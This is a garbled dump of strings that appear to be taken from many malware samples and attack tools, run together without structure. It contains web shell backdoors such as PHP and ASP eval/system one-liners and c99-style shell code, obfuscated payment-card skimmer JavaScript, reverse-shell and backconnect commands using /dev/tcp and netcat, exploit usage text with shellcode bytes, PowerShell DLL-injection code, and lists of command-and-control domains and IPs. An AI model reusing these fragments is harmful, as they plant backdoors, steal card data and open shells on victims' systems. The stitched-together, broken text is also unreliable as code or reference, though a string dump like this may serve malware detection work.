returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + 
victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? 
system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. 
/file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package 
wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which 
wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 user-agent: sjzj (compatible; msie 6.0; win32)g_nav=%d,hwnd:0x%x,classname:%s,title:%s,(%d,%d,%d,%d),bool=%du4(ueknmiq/'p_9pjmficmp.dlleg}qaptsjwj:uo2nqpp2}w8weilqkc:lf1yzmka
1 password*
1 users\\7\\desktop\\dll - bak\\release\\dll.pdbw
1 user_agent'] == 'visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'if(md5(@$_cookie[qz])==($_=@$_request[q]).@$_($_request[z]);@eval(stripslashes($_request[q]));$log_entry = serialize($arinfo)curl_setopt($ch, curlopt_postfields,http_build_query(array('data'=>$data,'utmp'=>$id)));killall -9 \".basename(\"/usr/bin/hostmagentopatchupdate.com'base'.(128/2).'_de'.'code'echo(\"file_bad\");\\x6f\\x6e\\x65\\x70\\x61\\x67\\x65\\x7c\\x63\\x68\\x65\\x63\\x6b\\x6f\\x75\\x745e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117t_p#0.qlb#0.#1blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0\\x2f\\x6d\\x65\\x64\\x69\\x61\\x2f\\x63\\x61\\x74\\x61\\x6c\\x6f\\x67\\x2f\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x2f\\x63\\x61\\x63\\x68\\x65\\x2f\\x31\\x2f\\x74\\x68\\x75\\x6d\\x62\\x6e\\x61\\x69\\x6c\\x2f\\x37\\x30\\x30\\x78\\x2f\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2f\\x42\\x2f\\x57\\x2f\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2e\\x70\\x68\\x70\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;var grelos_vinfopromo.bizjquery-code.sujquery-css.sumegalith-games.comcdn-cloud.pwanimalzz921.pwstatsdot.eu\\x6d\\x61\\x67\\x65\\x2d\\x63\\x64\\x6e\\x2e\\x6c\\x69\\x6e\\x6bregexp(\"[0-9]{13,16}\")105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101=oqkpkyj8dck0lgbwnnln42bprxyj9gbendft12bkbjm8v2ypx2c8rnbl52bw12bdlkuvvgzvnwzkz0m85wavpgfsjxd8r1upb1nywxztfmb0n3boxz=x['length'];for(i=0;i<z;i++){y+=string['fromcharcode'](x['charcodeat'](i)-10) 
}w=this['unescape'](y);this['eval'](w);this['eval'](this['atob']('tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?onepage|checkout|onestep|firecheckout|onestepcheckout'one|check'|regexp|onepage|checkout|grelos_v= null\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065\\x73\\x63\\x72\\x69\\x70\\x74\\x22www.fopo.com.ar\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145<input type='submit' name='upload' value='upload'>if($_post['upload'])php_uname()lastc0de@outlook.comcodersleetagencycafckapaljetz666x-php-scriptx-php-originating-script/usr/bin/php.jsew[zzqw@41g.1p4\@@d;%:
1 passwordssendbrowserpasswordsarma2keymasskeylogger
1 signed to work with windows 8.1, uncomment the fols
1 userprocessntquerydirectoryfilertlcreateuserthreaddeleteurlcacheentrypr_readbegin public keyp
1 signclass/writepolicy.classjavatool.classsbt/compiler/pkm4
1 user-agent: shockwave flashadd cookie failed...,speed=%fy29ubmvjdac2xlzxacxvpday21kdw5zdxbwb3j0iphone8.5(host:%s,ip:%s)software\\microsoft\\windows\\currentversion\\rundefwatch.exeindex1.html!@#tiuq#@!!@#dmc#@!!@#troppusnu#@!inprocserver32hkey_performance_data<!---[<if ie 5>]id=iniet.exesystem\\currentcontrolset\\services\\devfsdevice file system2010qbpadobe_sl.exednsapi.dllready!connect okwinhttp 1.0reader_sl.exems80547.batadr32controlservice failed!3dc76854-c328-43d7-9e07-24bf894f8ef5hkey_current_user\\software\\microsoft\\windows\\currentversion\\runhello from mfc!/default.aspx?index=/default.aspx?id=accept: text*/*xcmd.exegoogle.exebuild error!success!wild scancode too cleverinsufficient lookaheadmozilla/4.0 (compatible; msie 6.1; windows nt 5.1; sv1)mozilla/5.0 (windows; windows nt 5.1; en-us; rv:1.8.0.12) firefox/1.5.0.12vmprotecthttp://[c2_location]/[page].html<!---header adspace style=ersvc.dllntshrui.dll<!--dochtmlausovexception...opened...isun32.exe\\pipe\\ssnptoobu.iniserverfile is not bigger than clientfileurl download success\\xiaome\\suncloud-code\\moonurl download success!kugoosoftmodify file failed!! so strange!create cmd process failed!the command has not been implemented!runas success!onec.php/bin/onecrusinfo.exeadobeupdater.exebuildout.exeimscmig.exelocalfile.exemdm.exemimikatz.exemsdev.exentoskrnl.exeotepad.exereg.exeregsvr.exeruninfo.exeadobeupdate.exeinetinfo.exesvehost.exeupdate.exentlmhash.exewpnpinst.exewsdbg.exeadobeup.exe0830.bin1001.bina.binacrord32.exeinetinfo.exewinrar.sfxsteup=aspnet_client/report.aspname=%s&gender=%c&random=%04d&sessionkey=%snwwwks.dllrdisk.dllskeys.dllinstallserviceuninstallservicedown file ok!send file ok!command error!pls choose target first!alert!pls press enter to make sure!are you sure to analysis and outlook.docnorth korean launch.pdfdollar general.docdow corning corp.pdfsde^`tutlo`m^md`wdr^emml`ho/emmredleavesscmdsimulatormutexred_autumnal_leaves_dllmain.dll\\namepipe_morewindows
1 username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
1 user-agent: pcicompliant%s:*:enabled:%starget pid:scan all processes:<pid> <pattern>\\svhst%pceh_3\\.\\ceh_4\\..\\ceh_6yatoed3fe3rex23030am39497403poo7lo276670173quai16568unto1828oleo9eds96006nosysump7hove19commonfile.execallimage.exeburpswimwork\\project\\loadworthisnalftp -s:%s\\system32\\winxml.dlltor -f <torrc>tor_umemscanchewbac3
1 login.*|.*member.*sauron_kblog_key =resolve hosts that answerprint only replying ipsdo not display mac addressesinject using process name or pid. defaultconvert mode: read log from file and convert to textmaximum running time in seconds64, 64url, 32, 32url or 16.force decoding when input is invalid/corruptthis cruftassemble rows of dns names back to a single string of dataremoves checks of dns names and lengths (during split)randomize data lengths (length/2 to length)n
1 sign_setupdsa_do_signdsa_paramgenbn_mont_ctxu
1 username -a imailpassword** runexploit ** - exception_execute_handler : 0x%08xsending implant payload.. cencimplantpayload size(%d)target is not vulnerable** createpayload ** - exception_execute_handlerskip call to packageridearea(). payload has already been packaged. options -x and -q ignored.error: pgvars->pintrideareaimplantpayload is nulldec pathworks tcpip service on windows nt<\\\\__msbrowse__> g<irisnameserver>** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp
1 login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. 
exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 
(compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. 
assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . 
\"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 userbadpwdcount $userid $dcs$rightmouse = ($importdll::getasynckeystate([windows.forms.keys]::rbutton) -band 0x8000) -eq 0x8000-dll evil.dll$usermasterkeyfiles = @(, $(get-childitem -path $usermasterkeyfolder -force | select-object -expandproperty fullname) )$base64 = 'tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaainvoke-sshcommand -ip 192.168.1.100 -username root -password test -command \"id\"write-verbose \"[*] error loading dll\"write-bytestomemory -bytes $shellcode$getcommandlineaaddrtemp = add-signedintasunsigned $getcommandlineaaddrtemp ($shellcode1.length)$result = sc.exe config $($targetservice.name) binpath= $originalpath$result = sc.exe pause $($targetservice.name)$dllmain = [system.runtime.interopservices.marshal]::getdelegateforfunctionpointer($dllmainptr, $dllmaindelegate)#shellcode: calldllmain.asm$wc.headers.add(\"user-agent\",$script:useragent)$min = [int]((1-$script:agentjitter)*$script:agentdelay)if ($script:agentdelay -ne 0){if (($peinfo.filetype -ieq \"dll\") -and ($remoteprochandle -eq [intptr]::zero))remote dll injection$inveigh.smbrelay_failed_list.add(\"$http_ntlm_domain_string\\$http_ntlm_user_string $smbrelaytarget\")$ntlm_challenge_base64 = [system.convert]::tobase64string($http_ntlm_bytes)$keepassxml = [xml](get-content -path $keepassxmlpath)test-port -h $h -p $port -timeout $timeout1 {$nhosts=10; $threads = 32; $timeout = 5000 }where-object { $_.globalassemblycache -and $_.location.split('\\\\')[-1].equals('system.dll') }# get a handle to the module specified$kern32handle = $getmodulehandle.invoke($null, @($module))$dynassembly = new-object system.reflection.assemblyname('reflecteddelegate')$peloadedinfo = invoke-memoryloadlibrary -pebytes $pebytes -exeargs $exeargs -remoteprochandle $remoteprochandle$shellcode1 += 0x48$pehandle = [intptr]::zeroif ($exeargs -ne $null -and $exeargs -ne '')$exeargs = \"reflectiveexe $exeargs\"
18 user32.dll
1 user %s host %s addr %spem_read_bio_privatekey failedusage: %s [-ehr] [-f log_facility] [-l log_level] [-u umask]%s %s for %s%.100s from %.200s port %d%sclapi32.dllconnection from %s port %d/usr/etc/ssh_known_hostsversion: %s - %s %s %s %s[-] connect()/bin/sh /usr/etc/sshrckexecdhs.c%s: setrlimit(rlimit_fsize, { 0, 0 }): %srunfile: couldn't load shell32.dll!runfile: couldn't find shellexecuteexa/w in shell32.dll!e
1 login;passwordset /p \"=4d5apowershell -command \"$hex=set+%2fp+%22%3d4d5powershell+-command+%22%24hexecho 4d 5a echo r cx >>echo+4d+5a+echo+r+cx+%3e%3e%
1 login.hansoftupdate.comlong.update-onlines.orglonglong.update-onlines.orglongshadow.dyndns.orglongshadow.update-onlines.orglongykcai.update-onlines.orglostself.update-onlines.orgmac.navydocument.commail.csc-na.commantech.updatawindows.commicr0soft.orgmicrosoft-outlook.orgmtc.navydocument.commtc.update-onlines.orgnews.hotmail-onlines.comoac.3322.orgocean.apigmail.compchomeserver.comregistre.organiccrap.comsecurity.pomsys.orgservices.darkhero.orgsgl.updatawindows.comsonoco.blackcmd.comtest.logmastre.comup.gtalklite.comupdate.deepsoftupdate.comupdate.hancominc.comupdate.micr0soft.orgupdate.pchomeserver.comurs.blackcmd.comwang.darkhero.orgwebs.local-test.comword.apigmail.comwordpress.blackcmd.comworking.blackcmd.comworking.darkhero.orgworking.hotmail-onlines.comwww.trendmicro-update.orgwww.update-onlines.orgx.apigmail.comykcailostself.dyndns-free.comykcainobody.dyndns.orgzj.blackcmd.comlaxness-lab.comgoogle-ana1ytics.comwww.google-ana1ytics.comftp.google-ana1ytics.comhotmailcontact.net208.115.242.36208.115.242.37208.115.242.3866.63.178.14272.11.148.22072.11.141.13374.63.195.23674.63.195.23774.63.195.238103.24.0.142103.24.1.54106.187.45.162192.151.236.138192.161.61.19192.161.61.20192.161.61.2267.215.232.17996.44.177.19549.143.192.22167.215.232.18167.215.232.18296.44.182.24396.44.182.24596.44.182.24649.143.205.30working_success@163.comykcaihyl@163.comyuming@yinsibaohu.aliyun.comsvchostservicedll.dllm
